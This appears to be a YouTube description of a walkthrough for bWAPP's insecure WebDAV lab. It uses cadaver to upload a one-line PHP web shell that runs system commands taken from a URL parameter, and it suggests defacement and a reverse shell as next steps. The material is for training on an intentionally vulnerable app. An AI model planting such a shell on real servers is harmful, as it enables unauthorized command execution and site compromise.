bWAPP Insecure WebDAV Configuration

Insecure WebDAV Configuration - Low Security Level Solution: Step 1. On the lesson page click on WebDEV, a new window will pop up. http://10.0.2.4/webdav/ is the address to the webdav folder. We are going to use a tool called 'cadaver' to query webdav and upload a file to the remote server. Step 2. Open command prompt and type cadaver Type help it will display all the commands Give below commands open http://10.0.2.4/webdav/ ls put Step 3. Open new command prompt and create a simple php shell. Command - nano pseudotime.php Note: As angled brackets aren't allowed in YouTube Description, replacing them with ( ), kindly make necessary change. (?php echo system($_GET['cmd']); ?) Save the file put pseudotime.php pseudotime.php // Follow steps as shown in the video Step 4. Go to the url and give url as http://10.0.2.4/webdav/pseudotime.php?cmd=id. Note: Not covered in this video but you can explore this lesson further with - i. Upload an image to deface the website ii. Get a reverse shell generated. PseudoTime